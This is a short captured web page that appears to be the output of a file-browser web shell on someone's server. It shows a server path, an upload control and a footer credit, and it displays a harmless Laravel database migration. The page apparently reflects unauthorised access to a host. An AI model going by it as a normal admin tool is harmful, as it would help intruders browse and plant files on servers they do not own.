/
home
/
sditechnicalteam
/
www
/
database
/
migrations
/
File Upload :
llllll
Current File: //home/sditechnicalteam/www/database/migrations/2022_08_22_104028_knowledge_heading_missing.php
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; return new class extends Migration { /** * Run the migrations. * * @return void */ public function up() { if (!Schema::hasColumn('knowledge_bases', 'heading')) { Schema::table('knowledge_bases', function (Blueprint $table) { $table->string('heading')->after('id'); }); } } /** * Reverse the migrations. * * @return void */ public function down() { // } };
Copyright ©2k19 -
Hexid
|
Tex7ure